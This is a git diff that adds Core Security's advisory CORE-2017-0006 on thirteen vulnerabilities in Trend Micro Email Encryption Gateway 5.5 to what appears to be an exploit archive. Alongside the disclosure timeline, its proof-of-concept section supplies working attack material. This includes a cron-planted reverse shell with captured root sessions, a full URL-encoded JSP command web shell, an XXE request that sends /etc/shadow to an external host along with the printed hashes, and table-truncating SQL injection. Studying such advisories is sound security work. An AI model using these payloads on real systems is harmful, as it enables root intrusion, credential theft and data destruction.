diff --git a/exploits/jsp/webapps/44166.txt b/exploits/jsp/webapps/44166.txt new file mode 100644 index 000000000..babf75577 --- /dev/null +++ b/exploits/jsp/webapps/44166.txt @@ -0,0 +1,863 @@ +Core Security - Corelabs Advisory +http://corelabs.coresecurity.com/ + +Trend Micro Email Encryption Gateway Multiple Vulnerabilities + +1. *Advisory Information* + +Title: Trend Micro Email Encryption Gateway Multiple Vulnerabilities +Advisory ID: CORE-2017-0006 +Advisory URL: +http://www.coresecurity.com/advisories/trend-micro-email-encryption-gateway-multiple-vulnerabilities +Date published: 2018-02-21 +Date of last update: 2018-02-21 +Vendors contacted: Trend Micro +Release mode: Coordinated release + +2. *Vulnerability Information* + +Class: Cleartext Transmission of Sensitive Information [CWE-319], +External Control of File Name or Path [CWE-73], Insufficient +Verification of Data Authenticity [CWE-345], External Control of File +Name or Path [CWE-73], Missing Authentication for Critical Function +[CWE-306], Cross-Site Request Forgery [CWE-352], Improper Restriction of +XML External Entity Reference [CWE-611], Improper Neutralization of +Input During Web Page Generation ('Cross-site Scripting') [CWE-79], +Improper Neutralization of Input During Web Page Generation ('Cross-site +Scripting') [CWE-79], Improper Neutralization of Input During Web Page +Generation ('Cross-site Scripting') [CWE-79], Improper Neutralization of +Special Elements used in an SQL Command [CWE-89], Improper +Neutralization of Special Elements used in an SQL Command [CWE-89], +Improper Neutralization of Special Elements used in an SQL Command +[CWE-89] +Impact: Code execution +Remotely Exploitable: Yes +Locally Exploitable: Yes +CVE Name: CVE-2018-6219, CVE-2018-6220, CVE-2018-6221, CVE-2018-6222, +CVE-2018-6223, CVE-2018-6224, CVE-2018-6225, CVE-2018-6226, +CVE-2018-6226, CVE-2018-6227, CVE-2018-6228, CVE-2018-6229, CVE-2018-6230 + +3. *Vulnerability Description* + +Trend Micro's website states that:[1] + +Encryption for Email Gateway is a Linux-based software solution providing +the ability to perform the encryption and decryption of email at the +corporate gateway, regardless of the email client, and the platform from +which it originated. The encryption and decryption of email on the TMEEG +client is controlled by a Policy Manager that enables an administrator +to configure policies based on various parameters, such as sender and +recipient email addresses, keywords, or PCI compliance. Encryption for +Email Gateway presents itself as an SMTP interface and delivers email +out over an SMTP to configured outbound MTAs. This enables easy +integration with other email server-based products, be them content +scanners, mail servers, or archiving solutions." + +Multiple vulnerabilities were found in the Trend Micro Email Encryption +Gateway web console that would allow a remote unauthenticated attacker +to gain command execution as root. + +We also present two additional vectors to achieve code execution from a +man-in-the-middle position. + +4. *Vulnerable Packages* + +. Trend Micro Email Encryption Gateway 5.5 (Build 1111.00) +Other products and versions might be affected, but they were not tested. + +5. *Vendor Information, Solutions and Workarounds* + +Trend Micro published the following Security Notes: + +. +https://success.trendmicro.com/solution/1119349-security-bulletin-trend-micro-email-encryption-gateway-5-5-multiple-vulnerabilities + +6. *Credits* + +These vulnerabilities were discovered and researched by Leandro Barragan +and Maximiliano Vidal from Core Security Consulting Services. The +publication of this advisory was coordinated by Alberto Solino from Core +Advisories Team. + +7. *Technical Description / Proof of Concept Code* + +Trend Micro Email Encryption Gateway includes a web console to perform +administrative tasks. Section 7.4 describes a vulnerability in this +console that can be exploited to gain command execution as root. The +vulnerable functionality is accessible only to authenticated users, but +it is possible to combine 7.4 with the vulnerability presented in +section 7.5 to bypass this restriction and therefore execute root +commands from the perspective of a remote unauthenticated attacker. + +The application does also use an insecure update mechanism that allows +an attacker in a man-in-the-middle position to write arbitrary files and +install arbitrary RPM packages, leading to remote command execution as +the root user. + +Additional Web application vulnerabilities were found, including +cross-site request forgery (7.6), XML external entity injection (7.7), +several cross-site scripting vulnerabilities (7.8, 7.9, 7.10), and SQL +injection vulnerabilities (7.11, 7.12, 7.13). + +7.1. *Insecure update via HTTP* + +[CVE-2018-6219] +Communication to the update servers is unencrypted. The following URL is +fetched when the application checks for updates: + +/----- +[Request #1] + http://downloads.privatepost.com/files/TMEEG/updates/data.html +-----/ + +The product expects to retrieve a plain-text file with the following +format: + +/----- +[Version Info] +[Installation RPM file name] +[Path to release notes] +-----/ + +If a new update is found, then the RPM file is downloaded from the +following URL: + +/----- +[Request #2] +http://downloads.privatepost.com/files/TMEEG/updates/[Installation RPM +file name] +-----/ + +This means that the product does not do any kind of certificate +validation or public key pinning, which makes it easier for an attacker +to eavesdrop and tamper the data. + +7.2. *Arbitrary file write leading to command execution* + +[CVE-2018-6220] +The following code snippet is responsible for downloading the update +file (com/identum/pmg/web/CheckForUpdates.java): + +/----- +FileDownload fd = new FileDownload(); +if (!fd.download(updateURLRoot + "/" + rpmFileName, "/tmp/" + +rpmFileName)) { + return 10; +} +[...] +-----/ + +The rpmFileName variable is controlled by the attacker, as it is taken +from the aforementioned update file. As a consequence, the attacker +controls the path where the update file is going to be downloaded. The +RPM file is written by the root user with 0644 permissions. Being able +to write to the file system as root opens the door to several code +execution vectors on Linux machines. + +In this PoC we present one vector which consist on creating a cron job +on /etc/cron.d directory. + +The attacker can send the following response to [Request #1]: + +/----- +HTTP/1.1 200 OK +Content-Type: text/html +Server: Microsoft-IIS/7.5 +X-Powered-By: ASP.NET +Date: Tue, 23 May 2017 14:39:46 GMT +Connection: close +Content-Length: 26 + +5.7 +../../../../../../../etc/cron.d/test +test.html +-----/ + +As a result, the server will create the file /etc/cron.d/test. Its +contents are also controlled by the attacker. When the update launches, +the appliance will download it from the following URL: + +/----- +http://downloads.privatepost.com/files/TMEEG/updates/../../../../../../../etc/cron.d/test +-----/ + +The attacker can tamper the server's response and inject arbitrary data, +such as a reverse shell payload: + +/----- +* * * * * root /bin/bash -i >& /dev/tcp/external_server/1080 0>&1 +-----/ + +gaining code execution upon exploitation: + +/----- +$ sudo nc -lvvp 1080 +Listening on [0.0.0.0] (family 0, port 1080) +Connection from [server] port 1080 [tcp/socks] accepted (family 2, sport +52171) +bash: no job control in this shell +[root@ localhost ~]# id +uid=0(root) gid=0(root) +groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel) +context=user_u:system_r:unconfined_t +-----/ + +7.3. *Unvalidated software updates* + +[CVE-2018-6221] +The update mechanism described in 7.2 does not validate the RPM file +downloaded. + +An attacker in a man-in-the-middle position could tamper with the RPM +file and inject its own. + +The following code snippet is responsible for installing the unvalidated +RPM (com/identum/pmg/web/CheckForUpdates.java): + +/----- +try + { + System.out.println("running file:"); + System.out.println("rpm --upgrade --nodeps /tmp/" + rpmFileName); + + Process process = Runtime.getRuntime().exec("rpm --upgrade +--nodeps /tmp/" + rpmFileName); + [..] + { +-----/ + +In the following Proof of Concept, we crafted a malicious RPM file that +executes a reverse shell once opened. This can be achieved by adding a +reverse shell script to %pre section of RPM's SPEC file, which is +executed previous to any installation step. As can be seen, this results +in code execution as root: + +/----- +$ sudo nc -lvvp 1080 +Listening on [0.0.0.0] (family 0, port 1080) +Connection from [server] port 1080 [tcp/socks] accepted (family 2, sport +40445) +bash: no job control in this shell +[root@ localhost /]# id +uid=0(root) gid=0(root) +groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel) +context=root:system_r:rpm_script_t:SystemLow-SystemHigh +-----/ + +7.4. *Arbitrary logs location leading to command execution* + +[CVE-2018-6222] +The location of the log files can be changed in the logConfiguration.do +page. MimeBuildServer logs are particularly interesting because its +contents can be controlled by an attacker. + +The first step is to point the log file to the Web application root. The +following request redirects MimeBuildServer logs to +/opt/tomcat/webapps/ROOT/pepito.jsp and enables full debug logs: + +/----- +POST /logConfiguration.jsp HTTP/1.1 +Host: [server] +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:53.0) +Gecko/20100101 Firefox/53.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Referer: https://[server]/logConfiguration.do +Content-Type: application/x-www-form-urlencoded +Content-Length: 798 +Cookie: JSESSIONID=9363824A3BA637A8CC5B51955625075B +DNT: 1 +Connection: close +Upgrade-Insecure-Requests: 1 + +client0=KeyManager&warnLevel0=3&infoLevel0=1&debugLevel0=0&path0=%2Fvar%2Flog%2Fppg%2Fkeymanserver.log&client1=LauncherServer&warnLevel1=3&infoLevel1=1&debugLevel1=0&path1=%2Fvar%2Flog%2Fppg%2Flauncher.log&client2=KeyManagerClient&warnLevel2=3&infoLevel2=1&debugLevel2=0&path2=%2Fvar%2Flog%2Fppg%2Fkeymanclient.log&client3=MTAInterface&warnLevel3=3&infoLevel3=1&debugLevel3=0&path3=%2Fvar%2Flog%2Fppg%2Fmtainterface.log&client4=PolicyManagerServer&warnLevel4=3&infoLevel4=1&debugLevel4=0&path4=%2Fvar%2Flog%2Fppg%2Fpolicymanager.log&client5=SupervisorServer&warnLevel5=0&infoLevel5=3&debugLevel5=0&path5=%2Fvar%2Flog%2Fppg%2FSupervisorServer.log&client6=MimeBuilderServer&warnLevel6=3&infoLevel6=3&debugLevel6=3&path6=%2Fopt%2Ftomcat%2Fwebapps%2FROOT%2Fpepito.jsp&action=logConfiguration%3Apostback +-----/ + +The second step is to update the MimeBuilder configuration and insert +arbitrary JSP code. One candidate is the "Encrypted meeting request +email message" form. + +/----- +POST /mimebuilderconfig.jsp HTTP/1.1 +Host: [server] +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:53.0) +Gecko/20100101 Firefox/53.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Referer: https://[server]/MimeBuilderConfig.do +Content-Type: application/x-www-form-urlencoded +Content-Length: 2915 +Cookie: JSESSIONID=9363824A3BA637A8CC5B51955625075B +DNT: 1 +Connection: close +Upgrade-Insecure-Requests: 1 + +addEncryptionXHeader=on&encryptionXHeader=X-TMEEG-ENCRYPTED&addDecryptionXHeader=on&decryptionXHeader=X-TMEEG-DECRYPTED&addDecryptionNotice=off&decryptionNotice=javascript%3A%2F*%3C%2Fscript%3E%3Csvg%2Fonload%3D%27%2B%2F%22%2F%2B%2Fonmouseover%3D1%2F%2B%2F%5B*%2F%5B%5D%2F%2B%28%28new%28Image%29%29.src%3D%28%5B%5D%2B%2F%5C%2Ffud3uvq5miuqpikdqya3wzicu30woofc7z2nr%5C.burpcollaborator.net%2F%29.replace%28%2F%5C%5C%2Fg%2C%5B%5D%29%29%2F%2F%27%3E&errorOnVerificationFailure=off&meetingRequestEmailText=%3C%25%40+page+import%3D%22java.util.*%2Cjava.io.*%22%25%3E%0D%0A%3C%25%0D%0A%2F%2F%0D%0A%2F%2F+JSP_KIT%0D%0A%2F%2F%0D%0A%2F%2F+cmd.jsp+%3D+Command+Execution+%28unix%29%0D%0A%2F%2F%0D%0A%2F%2F+by%3A+Unknown%0D%0A%2F%2F+modified%3A+27%2F06%2F2003%0D%0A%2F%2F%0D%0A%25%3E%0D%0A%3CHTML%3E%3CBODY%3E%0D%0A%3CFORM+METHOD%3D%22GET%22+NAME%3D%22myform%22+ACTION%3D%22%22%3E%0D%0A%3CINPUT+TYPE%3D%22text%22+NAME%3D%22cmd%22%3E%0D%0A%3CINPUT+TYPE%3D%22submit%22+VALUE%3D%22Send%22%3E%0D%0A%3C%2FFORM%3E%0D%0A%3Cpre%3E%0D%0A%3C%25%0D%0Aif+%28request.getParameter%28%22cmd%22%29+%21%3D+null%29+%7B%0D%0A++++++++out.println%28%22Command%3A+%22+%2B+request.getParameter%28%22cmd%22%29+%2B+%22%3CBR%3E%22%29%3B%0D%0A++++++++Process+p+%3D+Runtime.getRuntime%28%29.exec%28request.getParameter%28%22cmd%22%29%29%3B%0D%0A++++++++OutputStream+os+%3D+p.getOutputStream%28%29%3B%0D%0A++++++++InputStream+in+%3D+p.getInputStream%28%29%3B%0D%0A++++++++DataInputStream+dis+%3D+new+DataInputStream%28in%29%3B%0D%0A++++++++String+disr+%3D+dis.readLine%28%29%3B%0D%0A++++++++while+%28+disr+%21%3D+null+%29+%7B%0D%0A++++++++++++++++out.println%28disr%29%3B+%0D%0A++++++++++++++++disr+%3D+dis.readLine%28%29%3B+%0D%0A++++++++++++++++%7D%0D%0A++++++++%7D%0D%0A%25%3E%0D%0A%3C%2Fpre%3E%0D%0A%3C%2FBODY%3E%3C%2FHTML%3E%0D%0A%0D%0A&encryptionVersion=zd&replyToSender=on&replyToAll=on&replyForward=on&zdMainTemplate=EncryptedMessageTemplate.html&zdAttachmentTemplate=EncryptedAttachmentTemplate.html&zdAttachmentPayloadTemplate=EncryptedAttachmentPayloadTemplate.html&preProcessMaxBlockSize=1914&preProcessMainDelimeter=%22%5C%3E%0D%0A%3Cinput+type%3D%22hidden%22+name%3D%22ibeMessage%22+id%3D%22ibeMessagePart__%5BAUTONUM%5D__%22+value%3D%22%0D%0A&preProcessInlineDelimeter=%22%5C%3E%0D%0A%3Cinput+type%3D%22hidden%22+name%3D%22ibeInline%22+id%3D%22ibeInlinePart__%5BAUTONUM%5D__%22+value%3D%22%0D%0A&b64EncodeAttachments=off&replyToSenderZdv4=on&replyToAllZdv4=on&replyForwardZdv4=on&zdMainTemplateZdv4=V4EncryptedMessageTemplate.htmlbt0ly&preProcessMaxBlockSizeZdv4=1914&preProcessMainDelimeterZdv4=%22%3E+%3Cinput+type%3D%22hidden%22+name%3D%22ibeMessage%22+id%3D%22ibeMessagePart__%5BAUTONUM%5D__%22+value%3D%22&preProcessInlineDelimeterZdv4=%22%3E+%3Cinput+type%3D%22hidden%22+name%3D%22ibeInline%22+id%3D%22ibeInlinePart__%5BAUTONUM%5D__%22+value%3D%22&b64EncodeAttachmentsZdv4=off&maxProcessThreads=10&mimeBuilderAction=mimeconfig%3Apostback +-----/ + +The next time the service components are restarted, the log file will be +created with the desired JSP code. + +With the sample JSP code from the previous request, the attacker would +then navigate to pepito.jsp and execute arbitrary commands as root: + +/----- +https://[server]/pepito.jsp?cmd=id + +Command: id + +uid=0(root) gid=0(root) context=system_u:system_r:java_t +-----/ + +7.5. *Missing authentication for appliance registration* + +[CVE-2018-6223] +The registration endpoint is provided for system administrators to +configure the virtual appliance upon deployment. However, this endpoint +remains accessible without authentication even after the appliance is +configured, which would allow attackers to set configuration parameters +such as the administrator username and password. + +The following request changes the administrator password to "sombrero": + +/----- +POST /register.jsp HTTP/1.1 +Host: [server] +Content-Type: application/x-www-form-urlencoded +Content-Length: 414 + +action=register%3Apostback&activationCode1=EE&activationCode2=XXXX&activationCode3=XXXX&activationCode4=XXXX&activationCode5=XXXX&activationCode6=XXXX&activationCode7=XXXX&resellerCode=&hostName=tester.localdomain®Email=pentester1@coresecurity.com&contactName=Test+Test&contactEmail=pentester1@coresecurity.com&contactPhone=%2B5491145712447&userName=administrator&password=sombrero&confirmPassword=sombrero +-----/ + +Note that a valid activation code is required. This code can be easily +obtained by requesting a trial from Trend Micro's website. + +7.6. *Lack of cross-site request forgery protection* + +[CVE-2018-6224] +There are no Anti-CSRF tokens in any forms on the Web interface. This +would allow an attacker to submit authenticated requests when an +authenticated user browses an attacker-controlled domain. + +This vulnerability can be chained with 7.4 and lead to remote command +execution. It could also be abused to force updates once the attacker is +in a man-in-the-middle position to exploit 7.2 or 7.3, which would also +lead to remote command execution. + +The following proof of concept starts the check for updates process. + +/----- + + + +
+ +
+ + +-----/ + +7.7. *XML external entity injection in configuration.jsp* + +[CVE-2018-6225] +The pciExceptionXml parameter of the configuration.jsp script is +vulnerable to XML external entity injection. + +The following proof of concept uses external entities to send the +/etc/shadow file to an external server. + +/----- +POST /configuration.jsp HTTP/1.1 +Host: [server] +User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) +Gecko/20100101 Firefox/53.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Content-Type: application/x-www-form-urlencoded +Content-Length: 938 +Cookie: JSESSIONID=E8357364AE748ACB904BE6E34F47F2DB +Connection: close +Upgrade-Insecure-Requests: 1 + + +incomingPort=25&externalHost=&outboundExternalPort=25&internalHost=&outboundInternalPort=25&pciUseSemantics=on&pciScanAttachments=on&pciExceptionbetween0=on&pciExceptionbetween1=on&pciExceptionText0=on&enabledInput=on&exceptionInput=&enabledInput=on&editExceptionInput=&enabledInput=on&startInput=&endInput=&enabledInput=on&startInput=&endInput=&action=configuration%3Apostback&pciExceptionXml=<%3fxml+version%3d"1.0"+encoding%3d"utf-8"%3f> + ++ +%25dtd%3b]> +<[CDATA[]]>%26send%3b]]> +-----/ + +The combine.dtd file is hosted on an external server, and its contents +are: + +/----- + +"> +%all; + +$ sudo nc -lvvp 1080 +Listening on [0.0.0.0] (family 0, port 1080) +Connection from [server] port 1080 [tcp/socks] accepted (family 2, sport +49676) +root:$1$8PtHrAEM$DmIkWpxYSOzhM0KLJGZvY/:14090:0:99999:7::: +bin:*:14089:0:99999:7::: +daemon:*:14089:0:99999:7::: +adm:*:14089:0:99999:7::: +lp:*:14089:0:99999:7::: +sync:*:14089:0:99999:7::: +shutdown:*:14089:0:99999:7::: +halt:*:14089:0:99999:7::: +mail:*:14089:0:99999:7::: +news:*:14089:0:99999:7::: +uucp:*:14089:0:99999:7::: +operator:*:14089:0:99999:7::: +games:*:14089:0:99999:7::: +gopher:*:14089:0:99999:7::: +ftp:*:14089:0:99999:7::: +nobody:*:14089:0:99999:7::: +rpm:!!:14089:0:99999:7::: +dbus:!!:14089:0:99999:7::: +exim:!!:14089:0:99999:7::: +nscd:!!:14089:0:99999:7::: +vcsa:!!:14089:0:99999:7::: +rpc:!!:14089:0:99999:7::: +sshd:!!:14089:0:99999:7::: +pcap:!!:14089:0:99999:7::: +haldaemon:!!:14089:0:99999:7::: +postgres:!!:14090:::::: +tomcat:!!:14090:0:99999:7::: +xfs:!!:14179:::::: +postfix:!!:14194:::::: +-----/ + +These actions require the user to be authenticated within the Web +console, so an attacker would need to obtain valid credentials first. +Possible vectors to achieve this include exploiting any of the XSS +issues described in 7.8, 7.9 and 7.10, or leveraging the XSRF +vulnerability described in 7.6. + +7.8. *Reflected cross-site scripting in keymanserverconfig.jsp* + +[CVE-2018-6226] +The deniedKeysExpireTimeout and keyAge parameters of the +keymanserverconfig.jsp script are vulnerable to cross-site scripting. + +The following is a proof of concept to demonstrate the vulnerability: + +/----- +https://[server]/keymanserverconfig.jsp?keyAge=3&keyAgeUnits=m&deniedKeysExpireTimeout=6000yta9q%22%3e%3cscript%3ealert(1)%3c%2fscript%3ekb4w2xa9v0d&keymanServerAction=kmsconfig%3Apostback +-----/ + +7.9. *Reflected cross-site scripting in mimebuilderconfig.jsp* + +[CVE-2018-6226] +The following parameters of the mimebuilderconfig.jsp script are +vulnerable to cross-site scripting: decryptionXHeader, encryptionXHeader, +meetingRequestEmailText, zdAttachmentPayloadTemplate, zdAttachmentTemplate, +zdMainTemplate, zdMainTemplateZdv4. + +The following is a proof of concept to demonstrate the vulnerability: + +/----- +https://[server]/mimebuilderconfig.jsp?zdMainTemplateZdv4=%22%3E%3Cscript%3Ealert(1)%3C/script%3E +-----/ + +7.10. *Stored cross-site scripting in editPolicy.jsp* + +[CVE-2018-6227] +The hidEmails parameter of the editPolicy.jsp script is vulnerable to +cross-site scripting. + +The following request adds a policy for the email address +"": + +/----- +POST /editPolicy.jsp HTTP/1.1 +Host: [server] +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:53.0) +Gecko/20100101 Firefox/53.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Referer: https://[server]/policies.jsp +Content-Type: application/x-www-form-urlencoded +Content-Length: 136 +Cookie: JSESSIONID=7D25474429E52C823C63357255A5E781 +DNT: 1 +Connection: close +Upgrade-Insecure-Requests: 1 + +action=editPolicy%3Apostback&hidEmails=&hidConditions=&hidRuleId=1&hidDelete=&ruleResult=3&ruleTarget=3&envId=1 +-----/ + +The input will be stored unescaped and rendered every time the policies.do +script is executed. + +Excerpt of the policies.do source showing the injected script tag: + +/----- + +Don't decrypt messages to + +-----/ + +7.11. *SQL injection in policies.jsp* + +[CVE-2018-6228] +The hidEditId parameter of the policies.jsp script is not sanitized, +leading to SQL injection. + +As can be seen in the following excerpt, the script reads a parameter +named hidEditId and forwards it to the editPolicy.jsp script if it is +not set to -1. + +From webapps/ROOT/policies.jsp: + +/----- +<% if (request.getParameter("hidEditId") != null) + if (request.getParameter("hidEditId").compareTo("-1") != 0) + { + String hid_edit_id = request.getParameter("hidEditId"); + %><% + } +[...] +-----/ + +The editPolicy.jsp script will pass this parameter without any +modification to the loadRuleDetails method, which is defined in the +formEditPolicy class + +From webapps/ROOT/editPolicy.jsp: + +/----- +if (request.getParameter("editRuleId") != null) +frm.loadRuleDetails(request.getParameter("editRuleId")); +[...] +-----/ + +Finally, the loadRuleDetails method will use the unsanitized parameter +it receives to build a dynamic SQL statement as follows: + +From webapps/ROOT/WEB-INF/classes/com/identum/pmg/web/formEditPolicy: + +/----- +public boolean loadRuleDetails(String ruleId) +{ + _databaseError = false; + + + try + { + _ruleId = ruleId; + _ruleResultId = dataStore.getRuleResultId(ruleId); + _ruleForId = dataStore.getRuleForId(ruleId); + _ruleEmails = dataStore.getRuleAddreses(ruleId); + _ruleSubRules = dataStore.getSubRules(ruleId); + [...] + +public String getRuleResultId(String ruleId) throws SQLException +{ + Connection cnn = MySQLClient.GetInstance().GetConnection(); + Statement query = cnn.createStatement(); + String ruleResultId = ""; + + ResultSet rs = null; + + try + { + rs = query.executeQuery("SELECT RuleResultId FROM RulesEngine +WHERE Id = " + ruleId); + [...] +-----/ + +The contents of ruleId will be appended to the SELECT query, resulting +in a SQL injection. + +The following PoC opens a policy to edit, even though the hidEditId +parameter is invalid. Due to the "always true" comparison, the first +element is retrieved: + +/----- +POST /policies.jsp HTTP/1.1 +Host: server +User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) +Gecko/20100101 Firefox/53.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Content-Type: application/x-www-form-urlencoded +Content-Length: 84 +Referer: https://server/editPolicy.jsp +Cookie: JSESSIONID=4CFE9B6E37DFABC16AF5D6F091F1A0E2 +Connection: close +Upgrade-Insecure-Requests: 1 + +action=policies%3Apostback&hidSequence=&hidEditId=178275005%20or%201%3d1%20LIMIT%201 +-----/ + +7.12. *SQL injection in editPolicy.jsp* + +[CVE-2018-6229] +The hidRuleId parameter of the editPolicy.jsp script is not sanitized, +leading to SQL injection in a DELETE statement. + +The following excerpt shows that the request object is forwarded to the +DeletePolicy method implemented in the formEditPolicy class. + +From webapps/ROOT/editPolicy.jsp: + +/----- +<% if (frm.isPostBack()) +{ + if (request.getParameter("hidDelete").compareTo("YES") == 0) + { + frm.DeletePolicy(request); + } +[...] +-----/ + +DeletePolicy reads the hidRuleId parameter and calls deletePolicy with +it, without doing any sanitization. + +From webapps/ROOT/WEB-INF/classes/com/identum/pmg/web/formEditPolicy: + +/----- +public boolean DeletePolicy(HttpServletRequest request) +{ + String ruleId = request.getParameter("hidRuleId"); + boolean success = dataStore.deletePolicy(ruleId); + _databaseError = (!success); + + return success; +} +-----/ + +Finally, the JPostgresDataHelper class uses the ruleId parameter to +build dynamic SQL statements, as can be seen in the following extract. + +From webapps/ROOT/WEB-INF/classes/com/identum/pmg/data/JPostgresDataHelper: + +/----- +public boolean deletePolicy(String ruleId) +{ + Connection cnn = null; + Statement query = null; + + boolean bSuccess = true; + + try + { + cnn = MySQLClient.GetInstance().GetConnection(); + cnn.setAutoCommit(false); + query = cnn.createStatement(); + + query.executeUpdate("DELETE FROM RulesEmailIndex WHERE +RulesEngineId = " + ruleId); + query.executeUpdate("DELETE FROM SubRuleIndex WHERE RulesEngineId += " + ruleId); + query.executeUpdate("DELETE FROM RulesEngine WHERE Id = " + ruleId); + [...] +-----/ + +The ruleId parameter will be appended as-is to the DELETE statements, +resulting in a SQL injection. + +The following request will cause the RulesEmailIndex, SubRuleIndex, and +RulesEngine tables to be truncated: + +/----- +POST /editPolicy.jsp HTTP/1.1 +Host: [server] +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:53.0) +Gecko/20100101 Firefox/53.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Referer: https://[server]/policies.jsp +Content-Type: application/x-www-form-urlencoded +Content-Length: 133 +Cookie: JSESSIONID=2B363A12C93CA038322EE551890FF30F +Connection: close +Upgrade-Insecure-Requests: 1 + +action=editPolicy%3Apostback&hidEmails=&hidConditions=&hidRuleId=223+OR++'1+'%3d+'1+'&hidDelete=YES&ruleResult=3&ruleTarget=3&envId=1 +-----/ + + +7.13. *SQL Injection in emailSearch.jsp* + +[CVE-2018-6230] +The SearchString parameter of the emailSearch.jsp script is not +sanitized, leading to a SQL injection. + +As can be seen in the following excerpt, the emailSearch.jsp script +reads a parameter named SearchString and calls the getResults method +defined in the wsEmailSearch class. + +From webapps/ROOT/emailSearch.jsp: + +/----- +if (session.getAttribute("UserName") != null) +{ + response.setContentType("text/xml"); + ws.setSearchParam(request.getParameter("SearchString")); + java.util.Vector res = ws.getResults(); + [...] +-----/ + +The searchParam property is not sanitized before being used to build a +dynamic SQL query, resulting in a SQL injection in the SELECT statement. + +From webapps/ROOT/WEB-INF/classes/com/identum/pmg/web/wsEmailSearch: + +/----- +public class wsEmailSearch +{ + private String _searchParam = ""; + public void setSearchParam(String searchParam) { _searchParam = +searchParam; } + + public Vector getResults() + { + Vector res = new Vector(); + + Connection cnn = MySQLClient.GetInstance().GetConnection(); + try + { + Statement query = cnn.createStatement(); + + ResultSet rs = query.executeQuery("SELECT address FROM +RulesEmailAddresses WHERE address LIKE '%" + _searchParam + "%' ORDER BY +address"); +[...] +-----/ + +The following proof of concept will cause all the e-mails on the +database to be retrieved: + +/----- +POST /emailSearch.jsp HTTP/1.1 +Host: server +User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) +Gecko/20100101 Firefox/53.0 +Accept: */* +Accept-Language: en-US,en;q=0.5 +Content-Type: application/x-www-form-urlencoded +Referer: https://server/policies.jsp +Content-Length: 39 +Cookie: JSESSIONID=4CFE9B6E37DFABC16AF5D6F091F1A0E2 +Connection: close + +SearchString=' OR '%1%'='%1 +-----/ + +8. *Report Timeline* +2017-06-05: Core Security sent an initial notification to Trend Micro, +including a draft advisory. +2017-06-05: Trend Micro confirmed reception of advisory and informed +they will submit it to the relevant technical team for validation and +replication. +2017-06-22: Core Security asked for an update on the vulnerability +reported. +2017-06-22: Trend Micro answered saying the cases are still being vetted +and that they will commit a time when the solution is finalized. +2017-08-28: Core Security asked again for an update on the vulnerability +reported. +2017-08-28: Trend Micro answered saying the team is still in the process +of creating the official fix for the vulnerabilities, although there is +still no official release date. +2017-10-02: Core Security asked again for an update on the vulnerability +reported. +2017-10-02: Trend Micro answered saying the team are still finalizing +the fix to ensure all vulnerabilities are covered. +2017-11-13: Core Security asked again (4th time) for an ETA for the +official fix. We stated we need a release date or a thorough explanation +on why after five months there is still no date defined. If there is no +such answer we will be forced to publish the advisory. +2017-11-14: Trend Micro answered saying the team is still working on two +vulnerabilities and due to the complexity and number of vulnerabilities +overall found, their team requires more time. +2018-01-16: Core Security asked again (5th time) for an ETA for the +official fix. +2018-01-23: Trend Micro answered proposing the publication date to be +February 7th. +2018-01-24: Core Security thanked Trend Micro's answer and asked if all +the vulnerabilities reported in the advisory will be addressed. In +addition, Core Security asked for CVE-IDs. +2018-01-24: Trend Micro confirmed all submitted vulnerabilities will be +addressed and notified Core Security they will send the CVE-IDs when +have these assigned. In addition, Trend Micro sent its new PGP key. +2018-01-29: Core Security thanked Trend Micro's confirmation and agreed +on the proposed release date. +2018-01-29: Trend Micro answered saying the team found a couple of +issues during the QA test. Consequently, Trend Micro asked for +additional time to fix the remaining vulnerabilities and required a +separated disclosure time. +2018-01-29: Core Security answered its intention to report all the +vulnerabilities in just one advisory and asked for a timeline for the fix. +2018-02-01: Core Security asked for an update on the remaining +vulnerabilities. +2018-02-02: Trend Micro sent an update and requested a week extension. +2018-02-02: Core Security thanked Trend Micro's update and agreed to +postpone the release. +2018-02-14: Trend Micro answered saying the remaining vulnerabilities +will not be addressed in the patch due to its complexity; therefore, +mitigation steeps will be recommending. Also, Trend Micro proposed +February 21 as the release date. +2018-02-14: Core Security thanked Trend Micro's update and agreed on the +proposed release date. +2018-02-21: Advisory CORE-2017-0006 published. + +9. *References* + +[1] +http://apac.trendmicro.com/apac/enterprise/network-web-messaging-security/email-encryption/ + + +10. *About CoreLabs* + +CoreLabs, the research center of Core Security, is charged with +anticipating the future needs and requirements for information security +technologies. +We conduct our research in several important areas of computer security +including system vulnerabilities, cyber attack planning and simulation, +source code auditing, and cryptography. Our results include problem +formalization, identification of vulnerabilities, novel solutions and +prototypes for new technologies. CoreLabs regularly publishes security +advisories, technical papers, project information and shared software +tools for public use at: +http://corelabs.coresecurity.com. + +11. *About Core Security* + +Core Security provides companies with the security insight they need to +know who, how, and what is vulnerable in their organization. The +company's threat-aware, identity & access, network security, and +vulnerability management solutions provide actionable insight and context +needed to manage security risks across the enterprise. This shared +insight gives customers a comprehensive view of their security posture +to make better security remediation decisions. Better insight allows +organizations to prioritize their efforts to protect critical assets, +take action sooner to mitigate access risk, and react faster if a breach +does occur. + +Core Security is headquartered in the USA with offices and operations in +South America, Europe, Middle East and Asia. To learn more, contact Core +Security at (678) 304-4500 or info@coresecurity.com + +12. *Disclaimer* + +The contents of this advisory are copyright (c) 2018 Core Security and +(c) 2018 CoreLabs,and are licensed under a Creative Commons Attribution +Non-Commercial Share-Alike 3.0 (United States) License: 